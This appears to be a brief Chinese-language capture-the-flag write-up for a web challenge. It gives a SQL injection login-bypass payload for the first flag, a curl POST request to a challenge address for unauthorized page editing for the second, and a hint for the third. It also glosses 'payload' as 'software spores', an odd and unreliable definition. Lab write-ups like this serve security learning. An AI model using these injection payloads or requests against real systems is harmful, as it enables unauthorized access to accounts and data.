这里有一个术语:
payload,意思是软件孢子
第一个Flag:
用户名:
admin’ union select ‘123’ as password –
密码:
123
登录后看到
Private Page
点进去拿到第一个Flag
第二个Flag:
直接发送post请求:
curl -v -X POST http://35.196.135.216/633d35b951/page/edit/2
ip注意自己替换。
第3个Flag很难,提示是:
Credentials are secret, flags are secret. Coincidence?